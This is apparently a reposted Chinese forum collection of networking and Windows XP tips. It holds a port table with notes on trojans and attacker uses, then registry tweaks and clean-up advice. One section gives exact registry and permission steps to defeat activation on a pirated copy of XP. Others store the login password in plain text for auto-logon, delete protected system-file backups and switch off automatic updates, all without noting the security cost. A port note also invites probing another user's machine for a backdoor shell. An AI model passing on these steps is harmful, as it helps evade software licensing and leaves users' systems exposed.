    TCP端口，即传输控制协议端口，需要在客户端和服务器之间建立连接，这样可以提供可靠的数据传输。常见的包括FTP服务的21端口，Telnet服务的23端口，SMTP服务的25端口，以及HTTP服务的80端口等等。

（2）UDP端口
    UDP端口，即用户数据包协议端口，无需在客户端和服务器之间建立连接，安全性得不到保障。常见的有DNS服务的53端口，SNMP（简单网络管理协议）服务的161端口，QQ使用的8000和4000端口等等。
常见网络端口

网络基础知识!端口对照

端口：0
服务：Reserved
说明：通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口，当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描，使用IP地址为0.0.0.0，设置ACK位并在以太网层广播。

端口：1
服务：tcpmux
说明：这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者，默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户，如：IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。

端口：7
服务：Echo
说明：能看到许多人搜索Fraggle放大器时，发送到X.X.X.0和X.X.X.255的信息。

端口：19
服务：Character Generator
说明：这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包，受害者为了回应这些数据而过载。

端口：21
服务：FTP
说明：FTP服务器所开放的端口，用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。

端口：22
服务：Ssh
说明：PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点，如果配置成特定的模式，许多使用RSAREF库的版本就会有不少的漏洞存在。

端口：23
服务：Telnet
说明：远程登录，入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术，入侵者也会找到密码。木马Tiny Telnet Server就开放这个端口。

端口：25
服务：SMTP
说明：SMTP服务器所开放的端口，用于发送邮件。入侵者寻找SMTP服务器是为了传递他们的SPAM。入侵者的帐户被关闭，他们需要连接到高带宽的E-MAIL服务器上，将简单的信息传递到不同的地址。木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口。

端口：31
服务：MSG Authentication
说明：木马Master Paradise、Hackers Paradise开放此端口。

端口：42
服务：WINS Replication
说明：WINS复制

端口：53
服务：Domain Name Server（DNS）
说明：DNS服务器所开放的端口，入侵者可能是试图进行区域传递（TCP），欺骗DNS（UDP）或隐藏其他的通信。因此防火墙常常过滤或记录此端口。

端口：67
服务：Bootstrap Protocol Server
说明：通过DSL和Cable modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址。HACKER常进入它们，分配一个地址把自己作为局部路由器而发起大量中间人（man-in-middle）攻击。客户端向68端口广播请求配置，服务器向67端口广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。

端口：69
服务：Trival File Transfer
说明：许多服务器与bootp一起提供这项服务，便于从系统下载启动代码。但是它们常常由于错误配置而使入侵者能从系统中窃取任何 文件。它们也可用于系统写入文件。

端口：79
服务：Finger Server
说明：入侵者用于获得用户信息，查询操作系统，探测已知的缓冲区溢出错误，回应从自己机器到其他机器Finger扫描。

端口：80
服务：HTTP
说明：用于网页浏览。木马Executor开放此端口。

端口：99
服务：Metagram Relay
说明：后门程序ncx99开放此端口。

端口：102
服务：Message transfer agent(MTA)-X.400 over TCP/IP
说明：消息传输代理。

端口：109
服务：Post Office Protocol -Version3
说明：POP3服务器开放此端口，用于接收邮件，客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交 换缓冲区溢出的弱点至少有20个，这意味着入侵者可以在真正登陆前进入系统。成功登陆后还有其他缓冲区溢出错误。

端口：110
服务：SUN公司的RPC服务所有端口
说明：常见RPC服务有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等

端口：113
服务：Authentication Service
说明：这是一个许多计算机上运行的协议，用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多计算机的信息。但是它可作为许多服务的记录器，尤其是FTP、POP、IMAP、SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务，将会看到许多这个端口的连接请求。记住，如果阻断这个端口客户端会感觉到在防火墙另一边与E-MAIL服务器的缓慢连接。许多防火墙支持TCP连接的阻断过程中发回RST。这将会停止缓慢的连接。

端口：119
服务：Network News Transfer Protocol
说明：NEWS新闻组传输协议，承载USENET通信。这个端口的连接通常是人们在寻找USENET服务器。多数ISP限制，只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子，访问被限制的新闻组服务器，匿名发帖或发送SPAM。

端口：135
服务：Location Service
说明：Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和RPC的服务利用计算机上的end-point mapper注册它们的位置。远端客户连接到计算机时，它们查找end-point mapper找到服务的位置。HACKER扫描计算机的这个端口是为了找到这个计算机上运行Exchange Server吗？什么版本？还有些DOS攻击直接针对这个端口。

端口：137、138、139
服务：NETBIOS Name Service
说明：其中137、138是UDP端口，当通过网上邻居传输文件时用这个端口。而139端口：通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于windows文件和打印机共享和SAMBA。还有WINS Regisrtation也用它。

端口：143
服务：Interim Mail Access Protocol v2
说明：和POP3的安全问题一样，许多IMAP服务器存在有缓冲区溢出漏洞。记住：一种LINUX蠕虫（admv0rm）会通过这个端口繁殖，因此许多这个端口的扫描来自不知情的已经被感染的用户。当REDHAT在他们的LINUX发布版本中默认允许IMAP后，这些漏洞变的很流行。这一端口还被用于IMAP2，但并不流行。

端口：161
服务：SNMP
说明：SNMP允许远程管理设备。所有配置和运行信息的储存在数据库中，通过SNMP可获得这些信息。许多管理员的错误配置将被暴露在Internet。Cackers将试图使用默认的密码public、private访问系统。他们可能会试验所有可能的组合。SNMP包可能会被错误的指向用户的网络。

端口：177
服务：X Display Manager Control Protocol
说明：许多入侵者通过它访问X-windows操作台，它同时需要打开6000端口。

端口：389
服务：LDAP、ILS
说明：轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。

端口：443
服务：Https
说明：网页浏览端口，能提供加密和通过安全端口传输的另一种HTTP。

端口：456
服务：[NULL]
说明：木马HACKERS PARADISE开放此端口。

端口：513
服务：Login,remote login
说明：是从使用cable modem或DSL登陆到子网中的UNIX计算机发出的广播。这些人为入侵者进入他们的系统提供了信息。

端口：544
服务：[NULL]
说明：kerberos kshell

端口：548
服务：Macintosh,File Services(AFP/IP)
说明：Macintosh,文件服务。

端口：553
服务：CORBA IIOP （UDP）
说明：使用cable modem、DSL或VLAN将会看到这个端口的广播。CORBA是一种面向对象的RPC系统。入侵者可以利用这些信息进入系统。

端口：555
服务：DSF
说明：木马PhAse1.0、Stealth Spy、IniKiller开放此端口。

端口：568
服务：Membership DPA
说明：成员资格 DPA。

端口：569
服务：Membership MSN
说明：成员资格 MSN。

端口：635
服务：mountd
说明：Linux的mountd Bug。这是扫描的一个流行BUG。大多数对这个端口的扫描是基于UDP的，但是基于TCP的mountd有所增加（mountd同时运行于两个端口）。记住mountd可运行于任何端口（到底是哪个端口，需要在端口111做portmap查询），只是Linux默认端口是635，就像NFS通常运行于2049端口。

端口：636
服务：LDAP
说明：SSL（Secure Sockets layer）

端口：666
服务：Doom Id Software
说明：木马Attack FTP、Satanz Backdoor开放此端口

端口：993
服务：IMAP
说明：SSL（Secure Sockets layer）

端口：1001、1011
服务：[NULL]
说明：木马Silencer、WebEx开放1001端口。木马Doly Trojan开放1011端口。

端口：1024
服务：Reserved
说明：它是动态端口的开始，许多程序并不在乎用哪个端口连接网络，它们请求系统为它们分配下一个闲置端口。基于这一点分配从端口1024开始。这就是说第一个向系统发出请求的会分配到1024端口。你可以重启机器，打开Telnet，再打开一个窗口运行natstat -a 将会看到Telnet被分配1024端口。还有SQL session也用此端口和5000端口。

端口：1025、1033
服务：1025：network blackjack 1033：[NULL]
说明：木马netspy开放这2个端口。

端口：1080
服务：SOCKS
说明：这一协议以通道方式穿过防火墙，允许防火墙后面的人通过一个IP地址访问INTERNET。理论上它应该只允许内部的通信向外到达INTERNET。但是由于错误的配置，它会允许位于防火墙外部的攻击穿过防火墙。WinGate常会发生这种错误，在加入IRC聊天室时常会看到这种情况。

端口：1170
服务：[NULL]
说明：木马Streaming Audio Trojan、Psyber Stream Server、Voice开放此端口。

端口：1234、1243、6711、6776
服务：[NULL]
说明：木马SubSeven2.0、Ultors Trojan开放1234、6776端口。木马SubSeven1.0/1.9开放1243、6711、6776端口。

端口：1245
服务：[NULL]
说明：木马Vodoo开放此端口。

端口：1433
服务：SQL
说明：Microsoft的SQL服务开放的端口。

端口：1492
服务：stone-design-1
说明：木马FTP99CMP开放此端口。

端口：1500
服务：RPC client fixed port session queries
说明：RPC客户固定端口会话查询

端口：1503
服务：NetMeeting T.120
说明：NetMeeting T.120

端口：1524
服务：ingress
说明：许多攻击脚本将安装一个后门SHELL于这个端口，尤其是针对SUN系统中Sendmail和RPC服务漏洞的脚本。如果刚安装了防火墙就看到在这个端口上的连接企图，很可能是上述原因。可以试试Telnet到用户的计算机上的这个端口，看看它是否会给你一个SHELL。连接到600/pcserver也存在这个问题。


电脑维修精华帖8

《一键清理系统垃圾》

电脑维修精华帖8

WinXP开机菜单含义

    在启动时按F8键或当计算机不能正常启动时，就会进入Windows XP启动的高级选项菜单，在这里可以选择除正常启动外的8种不同的模式启动Windows XP。

(1)安全模式：选用安全模式启动Windows XP时，系统只使用一些最基本的文件和驱动程序启动。进入安全模式是诊断故障的一个重要步骤。如果安全模式启动后无法确定问题，或者根本无法启动安全模式，那你就可能需要使用紧急修复磁盘ERD的功能修复系统了。

(2)网络安全模式：和安全模式类似，但是增加了对网络连接的支持。在局域网环境中解决Windows XP的启动故障，此选项很有用。

(3)命令提示符的安全模式：也和安全模式类似，只使用基本的文件和驱动程序启动Windows XP。但登录后屏幕出现命令提示符，而不是Windows桌面。

(4)启用启动日志：启动Windows XP，同时将由系统加载的所有驱动程序和服务记录到文件中。文件名为ntbtlog.txt，位于Windir目录中。该日志对确定系统启动问题的准确原因很有用。

(5)启用VGA模式：使用基本VGA驱动程序启动Windows XP。当安装了使Windows XP不能正常启动的新显卡驱动程序，或由于刷新频率设置不当造成故障时，这种模式十分有用。当在安全模式下启动Windows XP时，只使用最基本的显卡驱动程序。

(6)最近一次的正确配置：选择“使用‘最后一次正确的配置’启动Windows XP”是解决诸如新添加的驱动程序与硬件不相符之类问题的一种方法。用这种方式启动，Windows XP只恢复注册表项HklmSystemCurrentControlSet下的信息。任何在其他注册表项中所做的更改均保持不变。

(7)目录服务恢复模式：不适用于Windows XP Professional。这是针对Windows XP Server操作系统的，并只用于还原域控制器上的Sysvol目录和Active Directory目录服务。

(8)调试模式：启动Windows XP，同时将调试信息通过串行电缆发送到其他计算机。如果正在或已经使用远程安装服务在你的计算机上安装Windows XP，可以看到与使用远程安装服务恢复系统相关的附加选项。

XP轻松实现免激活升级

1.安装D版windows xp
2.打开注册表regedit
3.找到主键 Hkey_Local_Machine\Software\Microsoft\WindowsNT\CurrentVersion\WPAEvents\
4.删除子键lastWPAEventLoged
5.修改子键OOBETimer键值为：ff d5 71 d6 8b 6a 8d 6f d5 33 93 fd
6.右击注册表中“WPAEvents”键→“权限”→“高级”→“所有者”→你的用户名→“应用”→“确定”
7.回到“安全”标签→“高级”→选择列表中的“system”→“编辑”
8.把“拒绝”列下的方框全部打勾即可
9.“确定”退出
重起动发现已激活。这种方法可顺利升级！！！

{XP去除开机登陆画面!)

在进入Windows XP桌面之前，每次都会出现一个用脑登录界面，要求我们输入用户名与密码，可以加大了系统的安全性，也为多人共用一台电脑提供了方便，但如果是家用电脑，只有你一个人使用，这样每次密码，的确不有点不大方便。我们可以通过修改注册表来实现XP的自动登录。

第1步：运行“regedit”，以打开“注册表管理器”；运行注册表编辑器，依次展开[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon ]分支，然后在右侧窗口双击“DefaultUserName”，接着输入你的登录用户名。如果没有预设的用户名称，可以在注册表编辑器的菜单栏点选“编辑→新建→字符串值(s)→DefaultUserName”来添加这个项目，注意要区分大小写字母。

    第2步：同样在该分支下，在注册表编辑器的右侧窗口中双击“DefaultPassword”，假如未发现“DefaultPassword”一项，可按上面的步骤来新建该字符串值。

    第3步：接下来在右侧窗口中双击“AutoAdminLogon”，将数值设置为“1”。假如未发现“AutoAdminLogon”，可按上面的步骤来新建。

    现在关闭注册表编辑器并重新启动电脑，以后你会发现那个令人讨厌的登录对话框不见了。

WinXP瘦身办法

Windows XP安装后要占约1.5GB的硬盘空间，能不能让它也赶赶潮流，瘦一下身呢？跟我来。

1.删除系统文件备份
进入“WINDOWS\system32\dllcache”目录(默认为隐藏目录)，里面存储着约360MB的文件，它们是Windows XP系统文件的备份。当Windows XP的系统文件被替换、删除或修改时，系统可以自动从中提取出相应的系统文件进行还原，从而保证了系统的稳定性。如果你有Windows XP安装光盘或者已经将安装文件拷贝到硬盘上，那么你大可将此文件夹删除。注意：该文件夹不能直接删除，要在命令提示符下输入“sfc.exe /purgecache”(注意斜线前的空格)命令进行清除。

2.删除驱动备份
Windows XP自带了大量的硬件驱动程序，当检测到新硬件时系统会自动地提取相应的驱动程序进行安装。其实，多数情况下我们很少改变自己的硬件配置，因此在确定自己所需要的硬件驱动程序已经全部安装的情况下，可以将驱动备份文件删除。进入“WINDOWS\Driver Cache\i386”目录，找到名为“Driver.cab”的压缩文件，删除即可。此举可以释放出约73MB的硬盘空间。如果以后安装新硬件时系统找不到驱动程序，可以从安装光盘中提取。

3.删除不用的输入法
在Windows XP下有几种我们根本用不着的输入法，比如日文、韩文输入法等。删除的方法是：进入“控制面板→日期、时间、语言和区域设置→区域和语言选项”，选择“语言”选项卡，将“为东亚语言安装文件”前面的钩去掉，点“确定”后依提示删除不需要的语言选项。重新启动后，到“WINDOWS\ime”文件夹下直接删除“chtime”、“imjp8_1”和“imkr6_1”三个文件夹(它们分别对应繁体中文、日文、韩文)即可。此举可以释放约85MB的硬盘空间。

4.清空系统临时文件
在“\Documents and Settings\用户名\LocalSettings\Temp”目录下(默认为隐藏目录)存储的是软件安装或运行时留下的临时文件夹和废弃的文档，可以清空该目录。如果你是第一次这样操作，那么有可能释放出上百MB的硬盘空间。注意：这招可以经常使用。

XP瘦身，减肥大全

一、让系统盘更清净(可以在一定程序上保证你的电脑运行速度)
1、进入：控制面板--系统--高级--环境变量
2、单击用户变量中的TEMP--编辑--将那一长串内容变为D:\TEMP(根据你需要，可改成其它盘，但不是系统所在的就行了)
3、同上，将TMP同样改为D:\TEMP。因为这些东西是让你的系统盘快速膨胀的主要内患，其属性是隐藏的，有些朋友还找不到呢：)
4、在“系统变量”同样将TEMP和TMP改成上面的。
5、右键单击桌面“我的文档”--属性--目标文件夹中设置“目标文件夹位置”，将其改为D:\My Documents或D:\我的文档(喜欢哪个由你了)，然后可选移动。
   这个很重要，事实上当我们的电脑崩溃后，在系统盘中一般没有什么重要的东西，有用的都在My Documents中了，所以把它给挪个窝，你就什么也不用担心了，还有，有相当一部分朋友在DOS模式下还不会备份My Documents中的内容(因为那个文件夹名称很长，如果你用了中文，那就更麻烦了)
6、右键单击Internet Explorer--属性--常规--Internet临时文件--设置--移动文件夹--选择D:\Temporary Internet Files\(如果没有，可先创建，当然可用D:\TEMP或其它什么，你说了算)--确定
7、系统--高级--性能--设置--高级--虚拟内存--更改--选择D或其它非系统分区--自定义大小--输入大小M--设置；选C或系统所在分区--无分页文件--设置--确定，这样就把虚拟存储器也转到其他硬盘上了。
好了，这个世界(系统盘)清静了：)

     （转者注：虚拟内存，temp,tmp我曾转过，但在装某些软件的时候有些不妥又改了回去，若改建议一定要记住原路径。）
二，给XP减肥 (如果你的硬盘够用，可以不减了，因为万一想用其中的某个功能，你就没办法了
1.删除系统文件备份
sfc.exe /purgecache
2.删除驱动备份
windows\driver cache\i386目录下的Driver.cab文件（73mb)
3.取消系统还原(但记得要保留系统盘的系统还原哟，如果你不想用，就全给关闭了，反正我是保留着：)
4.删除Help文件（减掉40多mb)
5.删掉\WINDOWS\system32\dllcache下文件(减去200-300mb),这是备用的dll文件
只要你已拷贝了安装文件，完全可以这样做。
6.将工具软件装在系统盘，应用软件装在其他硬盘，特别提醒：你的FOXMAIL、QQ还有类似这样的东东，千万不可装在系统盘中，一旦系统完了，你也就OVER了：)（这对重装系统也有好处）。
7.删除\windows\ime下不用的输入法!(日文，韩文，简体中文输入法，84.5MB)
8.如果你认为自己有能力对付一些突发事件的话，就用ntfs装xp吧,本身就节省硬盘。不要装好汉，否则，等着CRY吧：P
三，删除烦人的msn，windows messenger
到C:\windows\inf\ 打开sysoc.inf
找 msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7 ，删除 hide，
变成msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7 ，保存。
到控制面板-添加删除程序，就有选项可以删除了。
四，让难以胜任工作的华医生Dr.Watson下岗
      这医生看着电脑生病，只告诉你可能是什么症状(里面的症状描述我想信他自己都不知道什么意思)，但不会告诉你得了什么病，最主要的是根本不给你看病(解决问题)，这样的医生要他何用，还不如我，让他下岗吧：)
    在"开始"->"运行"中输入"drwtsn32"命令，或者"开始"->"程序"->"附件"->"系统工具"->"系统信息"->"工具"->"Dr Watson"，调出系统里的华医生Dr.Watson ，只保留"转储全部线程上下文"选项(否则一旦程序出错，硬盘会读很久，并占用大量空间。如以前有此情况，请查找user.dmp文件，删除后可节省几十MB空间)。
、卸载无用的动态链接

五，删除资源管理器经常在内存中留下无用的动态链接，为了消除这种现象，你可以打开注册表编辑器，设置键值：HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionxplorer AlwaysUnloadDLL=DWORD: 1将其设为0，这一功能就会被关闭。重新启动计算机。
六，小硬盘用户有福了,有刻录机的朋友可以做gho版的XP了。
首先了解xp刚全新安装好的时候1.5G左右，默认的休眠和虚拟内存文件已经占了310m,把这两个关了可减至1.2G;把c:\windows\dllcab里面的两个压缩（只起不必每次都放系统碟作用）包80m删了，减至1.1G;还有把30m的日文和日文字典删了（我讨厌XXXXX），把c:\windows\fon里不必要的字体删了(50m左右)，减至1G;把c:\windows\system32\dllcab里面的全删了，那是dll副本320m可以放心删，至此减至680m;还有其他的250m忘了（有点过分的，微软知道会很不高兴的），有兴趣的朋友自己找，听说最低可以减至400m以下。
小心别删错了，本文只供参考，后果请自负。

七，让WINXP彻底瘦身的软件出来了！！可以卸载任何捆绑组件。包括IE。OUTLOOK,甚至Movie Maker ,MSN等等。
就是这个：XPlite
下载地址很多，这里提供2个：

http://www.onlinedown.net/soft/25033.htm
http://download.pchome.net/php/s ... mp;searchstr=XPlite

XPlite and 2000lite Professional 是一款功能非常强大的Windows XP和Windows 2000操作系统模块定制工具,程序运行后首先会取消Windows的系统文件保护功能,然后会自动扫描并获取当前操作系统中的软件配置情况,然后允许你任意卸载原本是操作系统中无法卸载删除的模块,比如操作系统原来自动安装的移动向导功能,计划任务功能,Windows SCript Host模块,核心字体模块,帮助和支持中心模块,语音功能模块,ODBC数据库驱动模块,搜索助手模块,Windows教程,驱动缓存模块,还有传真模块,聊天室模块,网络会议和电话拨号模块等等!程序共包含9大类几十种设定功能,通过此程序,你完全可以定制出一个属于自己独特的WindowsXP或者2000,也可以通过优化选择,作出只包含核心模块的最简操作系统,让WindowsXP和2000彻底瘦身。

建议使用前做好备份！！！（转者没用）

八，转者另删
一，删除所有原各文档内容；
二，删除原桌面背景；
三，删除原屏保程序（只保留了一个）；
四，删除所有原游戏；
五，删除共享文档。
以上内容我是在安全模式下用管理员身份删除的，有的还在注册表中有键值，你可搜搜全部删除。（千万别删错了）

九，删除其它无用文件建议使用supercleaner

十， NTFS分区中的文件压缩

    Windows XP对NTFS分区的文件提供了文件压缩属性，可有效的节省磁盘空间。

    在NTFS分区中，选择要压缩的文件或文件夹，单击鼠标右键，在快捷菜单中选择“属性”命令，然后在“属性”对话框的“常规”选项卡中单击“高级”按钮，在新对话框中的“压缩或加密属性”栏里勾选“压缩内容以便节省磁盘空间”复选框，在“确定”后你会发现文件所占用的磁盘空间大大减少了。

体验Windows XP系统内置的AT命令
    AT命令是Windows XP中内置的命令，它也可以媲美Windows中的“计划任务”，而且在计划的安排、任务的管理、工作事务的处理方面，AT命令具有更强大更神通的功能。AT命令可在指定时间和日期、在指定计算机上运行命令和程序。

    我们可以在“开始→运行”中输入AT命令，下面就来看看AT命令的一些实例分析。

    1、定时关机

    命令：at 21:00 ShutDown -S -T30

    该命令运行后，到了21:00点，电脑会出现“系统关机”对话框，并默认30秒延时自动关机。

    2、定时提醒

    命令：at 12:00 Net Send 10.10.36

    .122与朋友约会的时间到了，快点准备出发吧!

    其中Net Send是Windows内部程序，可以发送消息到网络上的其他用户、计算机。10.10.36.122是本机电脑的IP地址。这个功能在Windows中也称作“信使服务”。

    3、自动运行批处理文件

    如果公司的数据佷重要，要求在指定的日期/时间进行备份，那么运行：

    命令：at 1:00AM /Every:Saturday My_BackUp.bat

    这样，在每个Saturday（周六）的早上1:00点，电脑定时启动My_BackUp.bat批处理文件。My_BackUp.bat是一个你自行编制的批处理文件，它包含能对系统进行数据完全备份的多条命令。

    4、取消已经安排的计划

    命令：at 5 /Delete

    有时候，你已经安排好的计划可能临时变动，这样你可以及时地用上述命令删除该计划（5为指派给已计划命令的标识编号），当然，删除该计划后，可以重新安排。

WinXP/2000操作系统自动关机的实现

Windows XP(Windows 2000也可以)自身就具备定时关机的功能，下面我们就来看看如何实现Windows XP的自动关机。

    Windows XP的关机是由Shutdown.exe程序来控制的，位于Windows\System32文件夹中。如果想让Windows 2000也实现同样的效果，可以把Shutdown.exe复制到系统目录下。
    比如你的电脑要在22:00关机，可以选择“开始→运行”，输入“at 22:00 Shutdown -s”，这样，到了22点电脑就会出现“系统关机”对话框，默认有30秒钟的倒计时并提示你保存工作。如果你想以倒计时的方式关机，可以输入“Shutdown.exe -s -t 3600”，这里表示60分钟后自动关机，“3600”代表60分钟。

      设置好自动关机后，如果想取消的话，可以在运行中输入“shutdown -a”。另外输入“shutdown -i”，则可以打开设置自动关机对话框，对自动关机进行设置。

    Shutdown.exe的参数，每个都具有特定的用途，执行每一个都会产生不同的效果，比如“-s”就表示关闭本地计算机，“-a”表示取消关

机操作，下面列出了更多参数，大家可以在Shutdown.exe中按需使用。

用法: shutdown [-i | -l | -s | -r | -a] [-f] [-m \\computername] [-t xx] [-c "comment"] [-d up:xx:yy]

没有参数 显示此消息(与 ? 相同)
-i 显示 GUI 界面，必须是第一个选项
-l 注销(不能与选项 -m 一起使用)
-s 关闭此计算机
-r 关闭并重启动此计算机
-a 放弃系统关机
-m \\computername 远程计算机关机/重启动/放弃
-t xx 设置关闭的超时为 xx 秒
-c "comment" 关闭注释(最大 127 个字符)
-f 强制运行的应用程序关闭而没有警告
-d [u][p]:xx:yy 关闭原因代码
u 是用户代码
p 是一个计划的关闭代码
xx 是一个主要原因代码(小于 256 的正整数)
yy 是一个次要原因代码(小于 65536 的正整数)

    -f：强行关闭应用程序

    -m \\计算机名：控制远程计算机

    -i：显示图形用户界面，但必须是Shutdown的第一个选项

    -l：注销当前用户

    -r：关机并重启

    -t时间：设置关机倒计时

    -c "消息内容"：输入关机对话框中的消息内容(不能超127个字符)

WINXP优化精髓
加快开机与关机的速度：

①选“开始\运行”，键入Regedit，展开HKEY_CURRENT_USER\Control Panel\Desktop，将字符串值“HungAppTimeout”的数值更改为200，再将字符串值“WaitToKillAppTimeout”的数值数据更改为1000；

②另在HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control下，将字符串值“HungAppTimeout”的数值数据更改为200，将字符串值“WaitToKillServiceTimeout”的数值数据更改为〔1000〕；

③使用微软 Bootvis.exe 优化启动速度。我们到微软官方网站先下载 bootVis.exe，然后解压后运行bootvis.exe，之后在Trace下选next boot和driver delays等，此后XP会重新启动，并将记录启动数据产生成BIN的文件。再在“file\open中打开这个文件，在Trace下选Optimize system即可。
提示：此优化需时颇长，请耐心等待。

清除注册表内不用的DLL文件：

在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKKEY_LOCAL_MACHINE〕\〔SOFTWARE〕\〔Microsoft〕\〔Windows〕\〔CurrentVersion〕\〔Explorer〕
增加一个机码〔AlwaysUnloadDLL〕默认值为〔1〕
如默认值设定为〔0〕则代表停用此功能

加快宽频连接速度：

在〔开始〕\〔运行〕\键入〔regedit〕\在〔HKEY_LOCAL_MACHINE〕\〔SOFTWARE〕\〔Policies〕\〔Microsoft〕 \〔Windows〕
增加一个名为〔Psched〕的机码
在〔Psched〕右面窗口增加一个 Dword 值〔NonBestEffortLimit〕数值数据为〔0〕
『仅适用用 Windows XP 家用版本』

加快菜单显示速度：

在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKEY_CURRENT_USER〕\〔Control Panel〕\〔Desktop〕\将字符串值〔MenuShowDelay〕的数值数据更改为〔０〕
调整后如觉得菜单显示速度太快而不适应者可将〔MenuShowDelay〕的数值数据更改为〔200〕
重新启动生效 。

加快自动更新率：

在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKEY_LOCAL_MACHINE〕\〔System〕\〔CurrentControlSet〕\〔Control〕\〔Update〕\将 Dword〔UpdateMode〕的数值数据更改为〔０〕。重新启动生效。

关闭启动时加载不需要的程序：

如开机时有太多的程序要运行会影响开机的速度，先检查哪些些档案会在开机时运行
在〔开始〕\〔运行〕\键入〔msconfig〕\选〔启动〕
在启动内的程序是代表开机时要运行的程序，如需暂时停止运行某些程序便取消在〔□〕的〔X〕符号便可，如想恢复开机时运行此程序在〔□〕内加回〔X〕符号便可。

停用不需要的服务：
在〔开始〕\〔运行〕\键入〔services.msc〕打开服务窗口
检查右边窗口将不需要的服务在〔启动类型〕内选〔已禁止〕；再在〔服务状态〕中选〔停用〕

善用 CPU 的 L2 Cache 加快整体效能：

在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKEY_LOCAL_MACHINE〕\〔SYSTEM〕\〔CurrentControlSet〕\〔Control〕\〔SessionManager〕\在〔MemoryManagement〕的右边窗口将〔SecondLevelDataCache〕的数值数据更改为与 CPU L2 Cache 相同的十进制数值
例：P4 1.6G 的 L2 Cache 为 256Kb，数值数据更改为十进制数值 256
有关 L2 Cache 的数值并非如某些不负责任的网页乱抄过来，例如 P4 1.6G 的 L2 Cache 为 256Kb，但 P4 1.6GA 的 L2 Cache 为 512Kb
读者可以通过网络查询到有关 CPU 的 L2 Cache 的资料。

在启动计算机时运行 Defrag 程序 ：

在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKEY_LOCAL_MACHINE〕\〔SOFTWARE〕\〔Microsoft〕\〔Dfrg〕\〔BootOptimizefunction 〕
将字符串值〔Enable〕设定为〔Y〕等于开启，而设定为〔N〕等于关闭。

减少多重启动时等待时间：

方法一：用 Notepad 打开在 C:\　目录下的 boot.ini 档案，将内容〔timeout〕的设定值由预设的 30 (秒) 改为要求等待的秒数数字，存盘。
方法二：也可以通过〔开始〕\〔运行〕\键入〔msconfig〕，打开boot.ini 选项，进行秒数的修改。
方法三：右键点击“我的电脑”，选择属性\高级\启动和故障恢复\设置，在此修改启动等待时间。

关闭 XP 内设的烧碟功能：

如果不打算使用此功能可将其关闭，可加快使用 Nero 烧录软件的速度，因为Windows XP 的烧录系统由 Roxio 公司提供 (即与 Easy Cd Creator 同公司)。
在〔控制面板〕\〔管理工具〕\〔服务〕\在右边窗口选〔IMAPI CD-Burning COM Service〕\〔启动类型〕\选〔已停用〕

关机时自动关闭停止响应程序：

在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKEY_USERS〕\〔.DEFAULT〕\〔Control Panel〕\在〔Desktop〕右面窗口将〔AutoEndTasks〕的数值资料改为〔1〕
注销或重新启动即可。

移除Windows Messenger：

先用 Wordpad 打开 X:\WINDOWS\inf 下的 sysoc.inf 档案
X=（XP所在的磁盘区）
将内容〔msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7〕
更改为〔msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,7〕
存档及退出
然后在〔控制面板〕\〔添加或删除程序〕\〔添加／删除 Windows 组件〕\不选〔Windows Messenger〕\〔下一步〕\〔完成〕后便成功移除。

停止“磁盘空间不足”的通知 ：

当磁盘驱动器的容量少于 200MB 时 Windows XP 便会发出“磁盘空间不足”的通知
如需停止此功能,可按下面程序更改登录文件
在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKEY_LOCAL_MACHINE〕\〔Software〕\〔Microsoft〕\〔Windows〕\〔CurrentVersion〕\在〔Policies〕下增加一个机码名〔Explorer〕(如果已有便不用增加)\在〔Explorer〕增加一个 DWORD 值〔NoLowDiskSpaceChecks〕
数值数据为〔1〕= 停止通知，值数据为〔0〕= 默认值启动通知

关闭 windows 自动更新 ：

鼠标右点〔我的电脑〕\〔内容〕\〔自动更新〕
选“关闭自动更新，我要手动更新我的计算机”

关闭启动时窗口标志画面：

在〔开始〕\〔运行〕\键入〔msconfig〕\选〔boot.ini〕
然后在〔启动选项〕内选〔NOGUIBOOT]
重新开机便没有了窗口标志的画面

使用 Windows Media Player 9 播放 DVD 盘：
